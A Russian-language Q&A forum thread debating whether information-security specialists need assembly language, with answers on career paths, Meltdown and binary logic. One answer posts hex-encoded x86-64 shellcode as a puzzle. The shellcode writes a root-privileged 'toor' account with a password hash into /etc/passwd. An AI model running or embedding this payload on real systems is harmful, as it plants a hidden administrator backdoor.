@Fardeendragon
Student

Нужен ли ASSEMBLER специалисту по информационной безопасности?

Нужен ли ASSEMBLER специалисту по информационной безопасности?
В данный момент я изучаю язык C++ и учусь на специалиста в информационной безопасности. И вот тут напрашивается вопрос нужно ли мне знать ASSEMBLER?
В интернете все разделились на 2 лагеря: одни говорят, что он устарел и на замену ему пришли высокоуровневые языки программирования, а другие, как раз таки наоборот утверждают, что он нужен для "общения" с железом.
И все же, если не трудно ответить на этот пост, могли б ещё написать об + и -, данного языка(больно интересно).
  • Вопрос задан
  • 1355 просмотров
Пригласить эксперта
Ответы на вопрос 10
jcmvbkbc
@jcmvbkbc
"I'm here to consult you" © Dogbert
Нужен ли ASSEMBLER специалисту по информационной безопасности?
...
В интернете все разделились на 2 лагеря: одни говорят, что он устарел и на замену ему пришли высокоуровневые языки программирования...

Нужен ли алфавит специалисту по информационной безопасности?
...
В интернете все разделились на 2 лагеря: одни говорят, что алфавит устарел и на замену ему пришли эмодзи...
Ответ написан
CityCat4
@CityCat4 Куратор тега Информационная безопасность
Внимание! Изменился адрес почты!
Если собираетесь заниматься маршрутизаторами, политиками доступа, сетями или допустим написанием правил, руководств, инструкций, анализом логов (тоже нужная, хоть и муторная работа) или допустим аналитикой СМП - тогда скорее всего не нужен.
Если собираетесь заниматься "анти-взломом", железом, микроконтроллерами, вирусами-шифровальщиками и прочими проявлениями "дикого-дикого Запада" - нужен обязательно. Это все равно что специалисту по банковским сейфам спрашивать, а нужно ли ему курсы по приемам вскрытия сейфов :D
Ответ написан
Комментировать
inoise
@inoise
Solution Architect, AWS Certified, Serverless
Я может быть чего-то не знаю про Security, но когда это безопасность стала связана с языками программирования? Безопасность это шифрование данных (at rest и in transit), это протоколы авторизации и аутентификации, это реагирование на действие в системах, это мониторинг. В конце концов это набор политик и правил для организаций. Безопасность бывает разная. Да, есть вещи связанные с хранением доступов к системам, но это очень маленький срез и не зависит сильно от языка программирования.
Ответ написан
Комментировать
@Karpion
Знать ассемблер не нужно, но вот иметь представление о нём - необходимо. Хотя бы потому, что без этого невозможно понять, каким образом возникают уязвимости типа MeltDown.

Необходимый уровень знания ассемблера - зависит от специализации внутри профессии "ИБ".

Скорее всего, программировать на ассемблере не понадобится. Впрочем, ИБ-специалисты довольно редко программируют сами - они больше в чужих программах копаются.
Ответ написан
Комментировать
@dmfun
ASM хорош для всех в плане кругозора. Его знание не панацея и не обязательно делает хорошим спецом.
Но зато появится понимание многих вещей. Как минимум надо бинарные операции и логику выучить. Специалисты, которые не знают как AND и XOR работают и сдвиги, многое теряют. Именно программировать, наверное, не обязательно. Ознакомиться с базой, чтобы иметь представление. Думаю в ИБ еще есть много чему поучиться не сильно углубляясь в ASM.
Ответ написан
Комментировать
sergey-gornostaev
@sergey-gornostaev Куратор тега Assembler
Седой и строгий
одни говорят, что он устарел и на замену ему пришли высокоуровневые языки программирования

Спроси у них, что это и зачем
\x31\xdb\xf7\xe3\x50\xbb\xff\x73\x77\x64\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73
\x53\x48\x89\xe7\x87\xf2\x66\xbe\x01\x04\x04\x02\x0f\x05\x48\x97\xeb\x0e\x5e\x6a\x01\x58\x6a\x26\x5a
\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xed\xff\xff\xff\x74\x6f\x6f\x72\x3a\x73\x58\x75\x43\x4b\x69\x37\x6b
\x33\x58\x68\x2f\x73\x3a\x30\x3a\x30\x3a\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a
Ответ написан
Комментировать
Ассемблер обязателен специалисту по информационной безопасности. Я, как окончивший факультет по ИБ, могу сказать, что там его тоже изучают (не знаю, как у вас, но у меня уже было). Почему? Потому что исходный код на высоком уровне бывает не всегда очевидным. Приходится лезть на нижний уровень, чтобы искать там уязвимости. Бывают ещё такие решения, где лучше работать с ассемблером, чем с C++. Да и в арсенале специалиста по информационной безопасности должен быть богатый набор инструментов и языков программирования, чтобы уметь защищать от несанкционированного доступа, утечки или утраты ценной информации, нарушение работоспособности программы или устройства и так далее.
Ответ написан
Комментировать
Jump
@Jump
Системный администратор со стажем.
Ассемблер нужен специалисту по ИБ точно также как и IT специалисту.
Вот к примеру взять такого IT специалиста как консультант по внедрению 1с, фронтэнд разработчик, тестировщик, сетевой инженер, специалист по BigData, разработчик нейросетей, реверс инженер.

Вывод - в некоторых случаях, при работе в конкретной узкой специализации он может оказаться полезен, и иногда даже необходим. Но в большинстве случаев нужен примерно как слону пятая нога.
Ответ написан
Комментировать
asilonos
@asilonos
Программист
Да нужен, на первом этапе нужно о нем знать.
1) Потомучто если с ним не познакомится ты не поймеш что на некоторых системмах например уязвимость heartbleed очень маловероятно осуществима. (потомучто все експлойты под архитектуры x86-64, а что это значит??)
2) Linux Админы тебя как ИБ Админа, спокойно уговорят пропатчить ядро Linux для защиты от MeltDown, на отдельно стоящем "не shared" серваке. А этого не надо делать. ASM даст тебе это понимание.

На продвинутом ИБ уровне, нужно его немного знать чтобы ты мог отличить его код в высокоуровневых языках, для реализации всяких ИБ вещей. Потомучто ИБ спецы всегда учатся, ищут то-то новое, пишут Статьи. И вот чтобы чуш не написать случайно, нужно знать особенности Архитектур процессоров. ну хотбы одного )) И ASM тут идеальный способ.
Ответ написан
Комментировать
karp89
@karp89
Разработчик сайтов
100% нужен
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы